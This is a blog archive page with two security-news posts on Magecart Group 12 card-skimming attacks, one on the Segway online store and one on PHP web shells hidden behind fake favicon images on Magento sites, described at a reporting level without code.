Search This Blog

Powered by Blogger.

Blog Archive

Labels

Showing posts with label MageCart Group12. Show all posts

Magecart Allegedly Hacked the Segway Online Store

 

Researchers discovered an online skimmer on Segway's online store which allowed malicious actors to acquire credit cards and personal information from customers during checkout. 

The store has been hacked by Magecart skimmer, is majorly known for Dean Kamen's invention of the two-wheeled, self-balancing personal transporter, additionally, it also makes additional human mobility technologies.

"While the company doesn't know how Segway's site was hacked, an attacker will normally target vulnerabilities in the CMS system or one of its plugins." "The hostname at store.segway[.]com runs Magento, a major content management system (CMS) utilized by numerous eCommerce sites and a favorite of Magecart threat actors."

The attack was traced to Magecart Group 12 by Malwarebytes researchers who discovered a web skimmer on Segway's online store (store.segway.com). The Segway store was connecting a known skimmer website (booctstrap[.]com), which has been operational since November and has been linked to prior Magecart attacks.

The Magento CMS was utilized to breach the store, and threat actors exploited loopholes in vulnerable versions of the CMS or one of its plugins. The firm also discovered a piece of JavaScript hidden in a file called "Copyright," which isn't harmful in and of itself but periodically loads the skimmer. Anyone analyzing the HTML source code will not see the skimmer because of this method. 

The idea that the malicious actors are inserting the skimmer within a favicon.ico file is also noteworthy; Small icon visuals that connect to other sites are known as favicons. This new approach is becoming increasingly widespread, according to Uriel Maimon, senior director of technological innovations at cybersecurity firm PerimeterX. 

"Magecart attackers are getting increasingly inventive with the attempts to avoid detection, especially given the developments in access control over time." Manual code review, static program analysis, and scanners could not have easily spotted the skimmer script hidden behind a favicon claiming to display the site's copyright."

To prevent these types of attacks, buyers should pay with computerized systems, one-time cards, tokens with stringent charging restrictions, or simply pick cash on delivery if available. Using an internet security application that identifies and prevents malicious JavaScript from running on checkout pages may also save you the headache of obtaining your credit card information stolen.

MageCart Group12 Employing New Technique to Target E-Commerce Websites

 

MageCart Group12 is known for targeting e-commerce websites with the goal of skimming payment information from online shoppers and selling them on the dark web. The credit-card skimmer group is using PHP web shells to secure remote administrative access to the sites under attack to steal credit-card data, rather than using their previously favored JavaScript code, which they simply installed into vulnerable sites to log the information keyed into online checkout sites.

Researchers from Sucuri have learned that the scammers are saving their stolen credit-card data in .JPG files until they could be exfiltrated from compromised e-Commerce sites running Magento. Most users are stuck in an old version of Magento and are unable to upgrade because they do not have sufficient funds to hire the developer back once their site becomes out-of-date and vulnerable. 

The cost to migrate a Magento 1 website (which had its end of life in 2020) to the more secure Magento 2 ranges from $5,000 to $50,000. Researchers believe that Magecart will continue to evolve and enhance its attacking techniques as long as its cybercrimes keep turning a profit. 

“The file named Magento.png attempts to pass itself as ‘image/png’ but does not have the proper .PNG format for a valid image file. The way it is injected in compromised sites is by replacing the legitimate shortcut icon tags with a path to the fake .PNG file,” researchers explained. 

But in this new methodology, the phony favicon is used to load a PHP web shell. The web shell is harder to detect and block because it injects the skimmer code on the server-side, rather than the client side. “The creative use of the fake .JPG allows an attacker to conceal and store harvested credit-card details for future use without gaining too much attention from the website owner,” Luke Leal, a researcher at Sucuri stated.

“The latest techniques observed in these recent Magecart attacks show how the groups themselves are staying innovative by using previous techniques with new coding and tactics. The most recent findings highlight how difficult it may be for defenders to detect skimming activity itself without employing additional code reviews or other types of blocking and inspection, Sean Nikkel, senior cyber threat intel analyst at Digital Shadows told Threatpost. 

In September 2020, Magecart Group 12 hacked nearly 2,000 e-commerce sites in an automated campaign impacting tens of thousands of customers, who had their credit cards and other information stolen. Scammers employed the classic Magecart attack technique where e-commerce sites are injected with a web skimmer, which secretly exfiltrates personal and banking information entered by users during the online checkout process.